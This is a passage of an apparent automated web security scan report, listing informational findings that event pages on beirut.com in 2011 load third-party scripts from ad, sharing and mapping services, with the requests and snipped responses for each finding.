Path:   /ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Markets-and-Deals/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.713. http://www.beirut.com/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68472


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.714. http://www.beirut.com/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:01:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.715. http://www.beirut.com/ThingsToDo/Parties/1690334

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Parties/1690334

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Parties/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.716. http://www.beirut.com/ThingsToDo/Performances/112730726

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Performances/112730726

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Performances/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.717. http://www.beirut.com/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:09:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.718. http://www.beirut.com/ThingsToDo/Screenings/60463877

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Screenings/60463877

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Screenings/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.719. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Seminars-and-Lectures/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.720. http://www.beirut.com/ThingsToDo/Theater/706796009

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Theater/706796009

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Theater/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.721. http://www.beirut.com/ThingsToDo/ThisWeek

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/ThisWeek

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/ThisWeek HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.722. http://www.beirut.com/ThingsToDo/Today

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Today

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Today HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.723. http://www.beirut.com/ThingsToDo/Workshops/7278901598

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Workshops/7278901598

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Workshops/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
